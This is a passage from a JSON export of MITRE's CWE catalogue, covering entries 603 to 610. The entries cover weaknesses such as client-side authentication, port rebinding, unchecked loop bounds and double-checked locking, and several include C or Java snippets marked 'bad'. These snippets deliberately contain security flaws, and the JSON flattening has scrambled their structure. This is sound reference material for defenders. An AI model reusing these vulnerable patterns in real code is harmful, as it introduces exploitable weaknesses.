Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2008-04-11"}},{"#text":"Design Principle Violation: Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2009-01-12"}}]}},"603":{"attr":{"@_ID":"603","@_Name":"Use of Client-Side Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check.","Extended_Description":"Client-side authentication is extremely weak and may be breached easily. Any attacker may read the source code and reverse-engineer the authentication mechanism to access parts of the application which would otherwise be protected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"656","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not rely on client side data. Always perform server side authentication."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-0230","Description":"Client-side check for a password allows access to a server using crafted XML requests from a modified client.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Untrustworthy Credentials&#34;, Page 37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Client-Side Authentication","attr":{"@_Date":"2008-04-11"}}}},"605":{"attr":{"@_ID":"605","@_Name":"Multiple Binds to the Same Port","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When multiple sockets are allowed to bind to the same port, other services on that port may be stolen or spoofed.","Extended_Description":"On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its UDP packets/TCP connection.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Read Application Data","Note":"Packets from a variety of network services may be stolen or the services spoofed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Restrict server socket address to known local addresses."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code binds a server socket to port 21, allowing the server to listen for traffic on that port.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void bind_socket(void) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int server_sockfd;int server_len;struct sockaddr_in server_address;unlink(\\"server_socket\\");server_sockfd = socket(AF_INET, SOCK_STREAM, 0);server_address.sin_family = AF_INET;server_address.sin_port = 21;server_address.sin_addr.s_addr = htonl(INADDR_ANY);server_len = sizeof(struct sockaddr_in);bind(server_sockfd, (struct sockaddr *) &amp;s1, server_len);","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/*unlink the socket if already bound to avoid an error when bind() is called*/"}}}},"Body_Text":"This code may result in two servers binding a socket to same port, thus receiving each other\'s traffic. This could be used by an attacker to steal packets meant for another process, such as a secure FTP server."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP32","Entry_Name":"Multiple binds to the same port"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"}],"Previous_Entry_Name":{"#text":"Multiple Binds to Same Port","attr":{"@_Date":"2008-04-11"}}}},"606":{"attr":{"@_ID":"606","@_Name":"Unchecked Input for Loop Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not use user-controlled data for loop conditions."},{"Phase":"Implementation","Description":"Perform input validation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void iterate(int n){}void iterateFoo(){}","xhtml:div":[{"#text":"int i;for (i = 0; i &lt; n; i++){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"foo();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"unsigned int num;scanf(\\"%u\\",&amp;num);iterate(num);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) &gt; 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer &gt; BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index &lt; msg-&gt;msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg-&gt;msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-606"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Looping Constructs&#34;, Page 327"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-606"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"607":{"attr":{"@_ID":"607","@_Name":"Public Static Final Field References Mutable Object","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Protect mutable objects by making them private. Restrict access to the getter and setter as well."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Here, an array (which is inherently mutable) is labeled public static final.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"public static final String[] USER_ROLES;"}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"608":{"attr":{"@_ID":"608","@_Name":"Struts: Non-private Field in ActionForm Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActionForm class contains a field that has not been declared private, which can be accessed without using a setter or getter.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Make all fields private. Use getter to get the value of the field. Setter should be used only by the framework; setting an action form field from other actions is bad practice and should be avoided."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for a online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// variables for registration formpublic String name;public String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, within the RegistrationForm the member variables for the registration form input data are declared public not private. All member variables within a Struts framework ActionForm class must be declared private to prevent the member variables from being modified without using the getter and setter methods. The following example shows the member variables being declared private and getter and setter methods declared for accessing the member variables."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"609":{"attr":{"@_ID":"609","@_Name":"Double-Checked Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses double-checked locking to access a resource without the overhead of explicit synchronization, but the locking is insufficient.","Extended_Description":"Double-checked locking refers to the situation where a programmer checks to see if a resource has been initialized, grabs a lock, checks again to see if the resource has been initialized, and then performs the initialization if it has not occurred yet. This should not be done, as is not guaranteed to work in all languages and on all architectures. In summary, other threads may not be operating inside the synchronous block and are not guaranteed to see the operations execute in the same order as they would appear inside the synchronous block.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"367","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"While double-checked locking can be achieved in some languages, it is inherently flawed in Java before 1.5, and cannot be achieved without compromising platform independence. Before Java 1.5, only use of the synchronized keyword is known to work. Beginning in Java 1.5, use of the \\"volatile\\" keyword allows double-checked locking to work successfully, although there is some debate as to whether it achieves sufficient performance gains. See references."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK10-J","Entry_Name":"Do not use incorrect forms of the double-checked locking idiom"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-490"}},{"attr":{"@_External_Reference_ID":"REF-491"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Threading Vulnerabilities&#34;, Page 815"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Context_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Double Checked Locking","attr":{"@_Date":"2008-04-11"}}}},"610":{"attr":{"@_ID":"610","@_Name":"Externally Controlled Reference to a Resource in Another Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"219"}}},"Notes":{"Note":[{"#text":"This is a general class of weakness, but most research is focused on more specialized cases, such as path traversal (CWE-22) and symlink following (CWE-61). A symbolic link has a name; in general, it appears like any other file in the file system. However, the link includes a reference to another file, often in another directory - perhaps in another sphere of control. Many common library functions that accept filenames will \\"follow\\" a symbolic link and use the link\'s target instead.","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE 